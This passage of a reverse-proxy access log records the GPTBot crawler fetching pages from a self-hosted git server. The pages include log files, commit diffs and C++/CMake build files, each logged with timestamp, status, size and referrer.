(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:15:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 16178] [Gzip 7.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" -[17/Feb/2026:15:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 15256] [Gzip 6.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" -[17/Feb/2026:15:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 7414] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:15:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 19569] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" -[17/Feb/2026:15:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 14444] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:15:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:15:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 20991] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:15:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 38249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:15:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 14744] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" -[17/Feb/2026:15:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 12751] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:15:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 10141] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:15:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 17869] [Gzip 10.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:15:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 10141] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:15:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 9453] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:15:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 14402] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" -[17/Feb/2026:15:53:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 48135] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:15:53:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 12321] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" -[17/Feb/2026:15:53:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fstatus.json" [Client 74.7.227.38] [Length 22631] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json" -[17/Feb/2026:15:53:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2ftsconfig.json" [Client 74.7.227.38] [Length 23728] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json" -[17/Feb/2026:15:53:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fpackage.json" [Client 74.7.227.38] [Length 23518] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json" -[17/Feb/2026:15:53:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fmetadata.json" [Client 74.7.227.38] [Length 22984] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json" -[17/Feb/2026:15:53:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10688] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:53:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10563] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:53:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13179] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:53:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10564] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:53:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 14472] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:15:53:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 9945] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:15:53:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 20991] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:15:53:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10563] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:53:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10564] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:53:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 11738] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:53:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10563] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:53:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10567] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:53:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11042] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:53:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11046] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:53:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11042] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:53:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:53:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15109] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:53:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15110] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:53:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11042] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:53:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11043] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:53:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:53:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11040] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:53:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11042] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:53:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9975] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:53:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9978] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:53:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9975] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:15:53:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9978] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:53:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 